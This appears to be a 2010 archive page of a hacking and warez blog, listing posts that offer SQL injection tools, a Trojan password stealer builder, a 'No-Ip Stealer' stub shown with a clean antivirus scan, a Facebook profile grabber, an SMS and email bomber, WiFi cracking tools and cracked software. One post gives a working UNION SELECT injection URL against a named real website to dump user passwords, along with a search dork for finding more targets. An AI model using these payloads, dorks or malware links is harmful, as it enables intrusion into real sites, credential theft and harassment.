Home » Archives for March 2010
PHP Designer 2010 v7.1.0.31

PHP Designer 2010 v7.1.0.31 PHP Designer 2010 v7.1.0.31 | 28.9 MB PHP DESIGNER was created to help you enhance the process of edit, debug, analyze and publish PHP scripts all wrapped into a sophisticated streamlined interface!Get the complete IDE....


March 30th, 2010 PenTBox – Penetration Testing Security Suite
PenTBox is a Security Suite that packs security and stability testing oriented tools for networks and systems. Programmed in Ruby and oriented to GNU/Linux systems, but compatible with Windows, MacOS and every systems where Ruby works. It is free, licensed under GNU/GPLv3. PenTBox Contains Cryptography tools Base64 Encoder & DecoderMulti-Digest (MD5, SHA1, SHA256, SHA384, SHA512)Hash Password Cracker (MD5, SHA1, SHA256, SHA384,...


SQL video tutorials by Microsoft Certified Systems Engineer

SQL video tutorials by Microsoft Certified Systems Engineer SQL tutorial video by Microsoft certified Systems EngineerThis Transact SQL tutorial video is instructed by Microsoft certified Systems Engineer and Database administrator Mark Long....


Ethical Hacking Video Tutorial Pack

Ethical Hacking Video Tutorial Pack Ethical Hacking Video Tutorial PackWMV3 WMV | 360x288 | Video: 198kbps, audio: 20kbps | 2.76GBVTC Ethical Hacking & PenetrationVTC Intro To Computer ForensicsAnkit Fadia Certified Ethical HackerVarious Linux...


mysql magic_quotes_on bypass video
http://rapidshare.com/files/181224267/mysqlmagicquotes.rar.html...


Working Injection tool by Pr0xY v2.2.0
Injection tool by Pr0xY v2.2.0 Code: +---------------------------------------++ Injection tool by Pr0xY ++ Version 2.2.0 ++---------------------------------------+Examples to use: *Mode(SQLi helper) : main.pl *Mode(Blind helper): main.pl blind *Mode(SQLi scanner): main.pl sis (automatic attack = 0 [0=false/1=true])* *Mode(AdminFinder) : main.pl adminFinder *Mode(FTP BF) : main.pl FTPbf...


Injection tool by Pr0xY v2.2.0

Injection tool by Pr0xY v2.2.0 Code:+---------------------------------------++ Injection tool by Pr0xY ++ Version 2.2.0 ++---------------------------------------+Examples to use: *Mode(SQLi helper) : main.pl *Mode(Blind helper): main.pl blind *Mode(SQLi scanner): main.pl sis (automatic attack...


socks grabber v.1__drogan__

socks grabber v.1__drogan__ Now you can see what's hidden Code: http://www.2shared.com/file/8424271/..._Drogan__.html ...


PasswordsPro Tutorial (How to Crack hashes)

PasswordsPro Tutorial (How to Crack hashes) Hey guys, Just thought i would compile my recently obtained knowledge into a nice little Tutorial on the Basic use of PasswordsPro.My Tutorial will show you the 3 easiest Functions to make use of, Dictionary attack, Hybrid attack and Brute Force Attack.Before we begin,...


Vulnerable SQL injection

http://centrofilipino.com/index.php?...ign=taurus&id=SQL:-2 UNION SELECT user(),user(),user(),user(),concat(username,0x3a,p assword) FROM jos_users--some site in google searchthis bug is founded byHis0k4 [ALGERIAN HaCkEr]My Lesbian Radio - MyLesbianRadio.comWarwick Online - Hometype inurl:"com_jabode"if u found the user admin and pass/hashcrack...


sql injection tool SIPT v4 A Real Devil For SQL....

sql injection tool SIPT v4 A Real Devil For SQL.... http://rapidshare.com/files/166834188/sipt.rar ...


AKĐ SQL Injection 3.0 + source
AKĐ SQL Injection 3.0 + source Code: File .exe :http://www.aokhoacden.com/dl/akd-injection3.zipSource :http://www.aokhoacden.com/dl/akd-source.z...


10 Tricks to Exploit SQL Sites

Whether it is through manual poking and prodding or the use of securitytools, malicious attackers employ a variety of tricks to break into SQL server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems....


10 Tricks to Exploit SQL Sites

Whether it is through manual poking and prodding or the use of securitytools, malicious attackers employ a variety of tricks to break into SQL server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems....


WIFI Hacking Tools Browse Internet For Free
I am adding some tools that one can use for hacking a protected WIFI Network.Some of the included applications are-WIFI RadarAircrack-2.3 802.11 sniffer and WEP/WPA key crackerEasy to use wifi key finder even find key at 128-bit encryption..WPA-PSK you name it you will find it.Download: Download WiFi_Hack_Tools.zip for free on uploading.comDownload WFSIC.rar for free on uploading.com ...


Facebook Profile Grabber

Size: 25 MBDownload: http://rapidshare.com/files/36004325...le_grabber.rar ...


Working PAssword Stealer

nstruction:put your e-mailname of the serverthen click make trojan. (note: if you dont want to get infected dont click the server.)Its Working i have tested http://www.4shared.com/file/80052720/d78faa3c/KPS_10_By_Knight.html ...


Hide My Ass Pro VPN v1.8!

I took one for the team and bought this, now I uploaded exe for it to be crackedDownload: http://rapidshare.com/files/36390045...__Pro_v1.8.zipIf you have the skills you can be the FIRST crack one of the best vpn software out there. ...


Troxin Flooder[SMS/EMAIL] [BOMBER]

This is a program I was working on for two weeks. How did this program take two weeks to make? I did not use/leech any code. I did this program without the help of a source. Now I had a WAY better GUI, but due to the fact that I wanted to release to whomever wanted this, I deleted a lot of things. Yeah the GUI looks bad to you maybe,...


No-Ip Stealer

File InfoReport date: 2010-03-23 14:05:37 (GMT 1)File name: Stub.exeFile size: 744448 bytesMD5 Hash: 7e12bced1ad7ae7480fdadd36410d175SHA1 Hash: fdd7ba82110e4f94ce0bf1af1843e517cbf5ad23Detection rate: 0 on 21 (0%)Status: CLEANDetectionsa-squared - -Avast - -AVG - -Avira AntiVir - -BitDefender - -ClamAV - -Comodo - -Dr.Web -...

